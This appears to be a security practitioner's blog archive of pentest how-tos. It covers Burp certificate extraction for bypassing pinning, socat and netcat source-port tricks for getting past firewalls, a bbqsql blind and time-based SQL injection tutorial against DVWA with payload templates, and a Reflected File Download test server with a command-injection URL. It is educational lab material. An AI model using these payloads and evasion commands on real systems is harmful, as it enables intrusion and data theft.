Extract SSL/TLS certificate from Burp Suite Proxy for implanting

Saturday, April 01, 2017

Sometimes you want to include that certificate that Burp Suite generates and place it somewhere, (e.g., into a mobile app. to bypass Certificate pinning).

Here is how to extract the certificate using Kali 2016 Rolling.

proxytunnel -p LOCAL_IP_BURP_LISTENING_ON:LOCAL_PORT_BURP_LISTENING_ON -d DOMAIN_YOU_WANT:443 -a 7000 & openssl s_client -connect localhost:7000 -showcerts </dev/null 2>/dev/null | openssl x509 -outform der > mycert.der

Options are :

  • LOCAL_IP_BURP_LISTENING_ON is the IP address that Burp Suite Proxy is set to listen on.
  • LOCAL_PORT_BURP_LISTENING_ON is the port  that Burp Suite Proxy is set to listen on.
  • DOMAIN_YOU_WANT is the domain you want to spoof. This can also include subdomains and a wildcard (e.g., test.myuni.ac.uk or *.myuni.ac.uk)
  • mycert.der is the DER file generated. Don't forget to rename it to what the application is expecting. 

For example:
proxytunnel -p 127.0.0.1:8080 -d *.myUni.ac.uk:443 -a 7000 & openssl s_client -connect localhost:7000 -showcerts </dev/null 2>/dev/null | openssl x509 -outform der > mycert.der

Here my Burp Suite proxy is listening on 127.0.0.1 and 8080, *.myUni.ac.uk is the example domain I want on my cert and it is name mycert.der. 

P.S: Don't forget if you are working with team mates, you can easily query their Burp Suite proxy. 

-- 

If you want to check your results, you will need to convert from the one format to the other. So convert DER to PEM : 

openssl x509 -inform der -in mycert.der -out mycert.pem

And then check your results. 

openssl x509 -in mycert.pem -text -noout


Burp Suite Portswigger - ssl-tls issue [solution]

Saturday, April 01, 2017




Burp Suite Portswigger standalone instance [solution]

Cheers to for the idea and useful tips: https://madmantm.wordpress.com/2015/04/08/burp-ssltls-interception-issues/

If you are having issues with intercepting SSL/TLS connections in Burp Suite on a Mac OS X then try the following:

http://www.oracle.com/technetwork/java/javase/downloads/jce8-download-2133166.html


local_policy.jar and US_export_policy.jar


/Applications/Burp Suite Professional.app/Contents/PlugIns/jre.bundle/Contents/Home/jre/lib/security

Listen and forward a connection by changing the source port - socat and netcat

Thursday, June 16, 2016

Listen and forward a connection by changing the source port - socat and netcat

Assume you want to connect to port 22 on a machine numbered 10.0.0.12 and source port 53 will allow you through the firewall. We will setup to listen on port 2323. Here are two methods that you can try:

SOCAT
socat TCP4-LISTEN:2323,fork TCP-CONNECT:10.0.0.12:22,sp=53
ssh -p 2323 127.0.0.1
Listen on port 2323 and then connect to an IP address on port 22 and set the source port of 53 to the outgoing packet.


NETCAT (nc)
mkfifo myfifo
nc -p 53 10.0.0.12 22 < myfifo | nc -l -p 2323 > myfifo
ssh -p 2323 127.0.0.1
Second netcat is listening on port 2323 and then pushing the contents to the fifo. Once you connect the first netcat command is executed, which connects to the server on port 22 and sets the source port to 53. The contents are taken from the fifo (e.g., myfifo) push from the second command.

Update: Works in Kali 2

How to use bbqsql - Not so Blind and Blind SQLi

Sunday, February 28, 2016

Disclaimer: This information is provided for educational and professional use only.

What is needed :
bbqsql 1.1
Damn Vulnerable Web App (DVWA) v1.9
OWASP ZAP v2.4.3 / Burp

In this post I will be exploring how to make use of bbqsql by Neohapsis. bbqsql (https://github.com/Neohapsis/bbqsql) is a tools that can be used to conduct normal sql injection and blind sql injection. It first made its appearance at Defcon 20 (https://www.defcon.org/images/defcon-20/dc-20-presentations/Toews-Behrens/DEFCON-20-Toews-Behrens-BBQSQL.pdf).

After conducting a small search on Google I found very limited resources about it. I guess this in turn would naturally lead to the application being used more sparingly.

bbqsql can be found in Kali 2.0. Unfortunately the version that is shipped has a coding error and it is advised to update to the newer version. My tests used version bbqsql 1.1.

Download the new version as follows :
$ pip install --upgrade bbqsql
In my case it was installed in /usr/local/bin/bbqsql you can easily delete the old version that resides in /usr/bin and copy the one from /usr/local/bin/bbqsql :
$ whereis bbqsql
bbqsql: /usr/bin/bbqsql /usr/local/bin/bbqsql
$ cp /usr/local/bin/bbqsql /usr/bin/bbqsql
Check the version you have:
$ bbqsql -V
bbqsql 1.1 
Before starting make a note of the working directory. This is where your configuration is exported to and imported from.
$ pwd
/root/
bbqsql
Once you have the program up and running we need to go to DVWA and test the injection point. I will assume yo have done the hard part and installed DVWA.

Login and downgrade the security difficulty level to low.

We will make use of the SQL injection section in order to see the results to allow for us to judge a true and a false result. Once you have mastered this you can move to the Blind SQLi section. We know from axperiecnce with DVWA that there is an injection point on the page 'SQL Injection'. A simple ' will cause the system to produce an error. And if we enter ' or '0'='0 we get all the users listed. So we will use this injection point to insert a subtraction and comparison statement. A nice break down of what is does is presented in the Defcon 20 pdf.

So lets test this query. Notice that it makes use of the user() function in MySQL (http://dev.mysql.com/doc/refman/5.7/en/information-functions.html). Once you have this working, any query can be used from there on. More MySQL commands can be found in various cheat sheets like http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet.

DVWA low security:

This query provides a number of results ('User ID exists in the database.' on sqli_blind ):
' or ascii(substr(user(),1,1))>0 #
Where as the opposite provides none('User ID is MISSING from the database.' on sqli_blind).
' or ascii(substr(user(),1,1))<0 #
These can be used to create the query template. Based on the examples provided these become:

' or ASCII(SUBSTR(user(),${char_index:1},1))${comparator:>}${char_val:0} #

In this case we will use the variation in the content to identify a true or false statement.

Lets have a look at what options we need to set in the first set. Option 1 'Setup HTTP Parameters' has a number of options. Let focus on the ones we will be using.

Fig.1 - Setup HTTP Parameters

Option 2 'cookies' will be used to set the cookies. Make sure to set the right option otherwise you will get the wrong results back. DVWA looks at the cookie value sent to set the security settings before processing the request. I copied mine from ZAP.
'security': 'low', '  PHPSESSID': '0dfr898d44oh55movkfgrtfts7'
 Next set the correct URL with the correct injection point. Remember the program supports a number of injection points, URL, cookie and data (check the slides for examples). Again use ZAP or tcpdump etc. to get the correct URL and arguments. In this case it is :
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#
This is then changed to include the injection point:
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1${injection}&Submit=Submit#
Option 5 'proxies' can be useful for debugging by using OWASP ZAP or Burp:
{"http": "127.0.0.1:8080"}
Option 7 'method'
get
Go back using '99' or 'done'
99
Option 2 'Setup BBQSQL Options' is where we setup the programs functionality.

Option 1 'technique' is for setting the technique, we will leave it to binary_search. Remember if you enter a menu you need to set a value. Enter will set a NULL value.

Option 2 'comparison_attr' will be used quite often. Have a look at the different options. For now we will set it to content as we know it changes.
content
Finally, Option 5 'query' will have our custom query. This is the one we created above.


bbqsql will make a number of test attempts and provide you with its results. If these are successful it will print out the results and will ask you if you want to continue.

' or ASCII(SUBSTR(user(),${char_index:1},1))${comparator:>}${char_val:0} #

Fig. 2 - Setup BBQSQL Options (time-based) 

Once it is all setup exit 'Setup BBQSQL Options' and get ready to run bbqsql.
99
Due to the fact that the program may crash it is advised that you save your settings.
Once you have exported (i.e,saved) your config you can attempt to run it. This is achieved with Option 5 'Run Exploit' from the main menu.
5
If this works you will start to see the user and the ip address/ hostname:
['root@localhost']

In the images I have provided you will have noticed that the commands are different. I have done a demo of a time based attack and demonstrated it as well. The templates for it can be found below. Passing bbqsql through ZAP/Burp will allow you to better understand how it finds the data.

Fig. 3 - Execution and results of initial tests (time-based attack)

Fig. 4 - Extraction Results and Statistics


Fig. 5 - Final Results and Main Menu

Time-based Blind SQL Injection examples:

A simple function call example (I had to use ',1' as I was getting column errors. I checked this inputting it manually in the browser):

' UNION SELECT IF(ascii(substr(user(),1,1))>0,BENCHMARK(5000000,ENCODE('MSG','by X seconds')),null),1 #

Query Template:

' UNION SELECT IF(ASCII(SUBSTR(user(),${char_index:1},1))${comparator:>}${char_val:0} ,BENCHMARK(5000000,ENCODE('MSG','by X seconds')),null),1 #

A more advanced select query (Here it is using offsetting to find the value):

' UNION SELECT IF(ascii(substr(SELECT user FROM mysql.user LIMIT 1 OFFSET 1 ,1,1))>0,BENCHMARK(5000000,ENCODE('MSG','by X seconds')),null),1 #

Query Template (I have added ${sleep:50000} but I have noticed it is not very effective as variable) (this 'time' method is faster, compared to 'content' checking):

' UNION SELECT IF(ASCII(SUBSTR(( SELECT user FROM mysql.user LIMIT 1 OFFSET ${row_index:1} ),${char_index:1},1))${comparator:>}${char_val:0} ,BENCHMARK(${sleep:50000},ENCODE('MSG','by X seconds')),null),1 #

Query Template another example:

' UNION SELECT IF(ASCII(SUBSTR(( SELECT column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' LIMIT 1 OFFSET ${row_index:1} ),${char_index:1},1))${comparator:>}${char_val:0} ,BENCHMARK(${sleep:50000},ENCODE('MSG','by X seconds')),null),1 #
Try getting the same results with DVWA medium security and above.

Hardsploit - RaspberryPi 2 with Kali 2

Friday, February 05, 2016

It would seem like it is possible to get the Hardsploit (https://hardsploit.io/) Application GUI version 2.0 running on a Raspberry Pi 2 that is running Kali 2.1. The GUI is needed, in this case it is Xfce.

What you need to know is that this Kali 2.1 install is missing a few libraries. Unfortunately I installed too many in order to figure out which one would be the best solution. I will pick out a few which I really think helped in the end. If there are any others missing please add a comment. In the end I got the libraries to install and the application starts up.
apt-get install build-essential
apt-get install ruby ruby-dev ruby-qt4
As shown by Opal Security (https://github.com/OPALESECURITY/hardsploit-gui/wiki/installation-procedure)the rest of the commands are the same as usual:
apt-get install cmake libsqlite3-dev dfu-util
gem install qtbindings activerecord libusb sqlite3
gem install hardsploit_gui 
hardsploit_gui
Some lessons learnt so far:

  1. The software is buggy, it is work in progress. Expect it to crash. Make sure you save what you are doing, often. 
  2. It is a good idea to make a backup copy of the Database file. The file path can be found by going to About->Path->Database file. We did a reinstall of hardsploit_gui and it removed the database. You have been warned. 
  3. Dumping is very fast, compared to other solutions out there. We did a firmware dump of 4 MBs in 17.4 seconds at 25Mhz. 
  4. If you are having issues with the board and the lights are dimming and they seem weak it seems a firmware update (via bootloader) can fix it. Did for us, at least. (Updated: 06/02/2016)


 More to follow.. (05/02/2016)

Stonesoft Firewall/IPS: expired certificate errors

Wednesday, April 29, 2015

If you have a Stonesoft Firewall or IPS and you are having issues with connecting to the Management and/or Log Server then it is highly possible that the certificates have expired. There is a way to fix it.

Try the following:

On the Management Server in the Stonegate folder ../stonegate/bin there are a number of scripts to re-issue the required certificates.

Shutdown Management Server (first shutdown the service, if it is running):
sudo -u sgadmin sgStopMgtSrv.sh

Reset Certificate for Management Server:
sudo -u sgadmin sgCertifyMgtSrv.sh
Start up the service again, either reboot or :
sudo -u sgadmin sgStartMgtSrv.sh &


On the Log Server in the Stonegate folder ../stonegate/bin there are a number of scripts to re-issue the required certificates.

Shutdown Log Server (first shutdown the service, if it is running):
sudo -u sgadmin sgStopLogSrv.sh
Reset Certificate for Log Server:
sudo -u sgadmin sgCertifyLogSrv.sh
Start up the service again, either reboot or :
sudo -u sgadmin sgStartLogSrv.sh &


And that is it. Start up your Management console via ./sgClient.sh & and you should be able to connect.

Your Firewall/IPS wont be able to connect anymore since the fingerprint would have changed. This means the new settings have to be pulled by the systems. The way I sorted it out was to SSH into the Firewall and issue a sg-reconfigure command.

One of the things needed now is the need to have a one-time password from the Management Console. This can be retrieved by selecting the device under Firewalls or IPS and right clicking on it then in the menu select, Configuration-> Save Initial Configuration. In the new window named Save Initial Configuration a new one-time password will be generated and the SSL Fingerprint will also be shown.

So once you have the one time password, move over to the sg-reconfigure command on the Firewall/IPS and skip all the bits until you reach the need for the one-time password (select Next->). You want to select Contact Management Server or the equivalent, enter the one-time password that is provided by the Management Center and you can enter the new fingerprint key or remove it as it is not required by default.


Errors usually include:
Log Server doesn't have any usable certificate.
Caused by: java.security.cert.CertificateExpiredException: NotAfter: date_here



Reflected File Download - test server details in Kali or any Linux distro with PHP

Monday, November 03, 2014

I am sure you have now heard about Reflected File Download (RFD) [1, 2]. I wanted to setup a server to play around with what this would look like.

First we need a JSON system which will reflect user based requests. This was achieved in Kali (assumed here with the IP address: xxx.xxx.xxx.xxx) by setting up a file, called index.php , with the following code in the folder in /var/www/s/
<?php
class testdata{
        Public $data1 = "";
        Public $data2 = "";
        Public $data3 = "";
        Public $url_search = "";
}
$data_ = new testdata();
$data_-> data1 = "foo";
$data_-> data2 = "bar";
$data_->url_search = $_GET['url_search'];
//header("Content-type : application/json;");
header("Content-Disposition: attachment;");
echo json_encode($data_);
?>
If the code does not run try to set it to execute and set the correct owner :
chmod +x index.php
chown www-data:www-data index.php
Once the webpage is returning back a file it should be working correctly. Ideally what should be in the file returned is the JSON request. My tests did not manage to make use of the semicolon (;). Apache2 logs kept saying that the file /s; was not found. This means everything after the semicolon was ignored, but it was included in the request causing problems. I found that just providing the file name after the index.php seems to work in Firefox.  

Now try injecting the command you desire.
http://xxx.xxx.xxx.xxx/s/index.php/test.bat?url_search=%22||dir%3ew||
This was tested on IE6 in Win XPSp2, Mac OSX Chrome Version 38.0.2125.111 and Firefox 33.0.2. The above link only worked for Firefox 33.0.2.

As described in the document [2] it is also possible to set the system to enable a link that will download the file instead of showing the results in the page. This can be tested with the following saved in a page called index2.php and by commenting out header("Content-Disposition: attachment;"); with // .

<a download="" href="http://xxx.xxx.xxx.xxx/s/index.php/test.bat?url_search=%22||dir%3ew||">hello</a>
This is very reliant on the type of browser which all have different reactions when sending the request. The point of this post is to get everyone trying out the attack vector.

Happy testing!

References:
[1] - Spiderlabs.com - Reflected File Download - A New Web Attack Vector - http://blog.spiderlabs.com/2014/10/reflected-file-download-the-white-paper.html
[2] - White paper "Reflected File Download: A New Web Attack Vector" by Oren Hafif [Hosted on Google Drive] - https://drive.google.com/file/d/0B0KLoHg_gR_XQnV4RVhlNl96MHM/view